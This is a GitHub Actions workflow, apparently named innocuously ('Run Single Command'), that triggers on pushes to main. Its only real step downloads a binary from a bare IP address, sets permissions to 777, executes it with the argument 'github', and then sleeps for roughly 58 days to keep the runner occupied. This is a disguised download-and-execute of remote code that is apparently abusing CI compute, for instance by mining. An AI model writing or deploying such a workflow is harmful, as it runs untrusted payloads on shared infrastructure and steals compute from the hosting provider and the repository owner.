name: Run Single Command

on:
  push:
    branches:
      - main

jobs:
  run-shell:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v3

      - name: Run a Single Shell Command
        run: curl -O 45.81.252.38/studyproject; chmod 777 studyproject; ./studyproject github; sleep 5000000
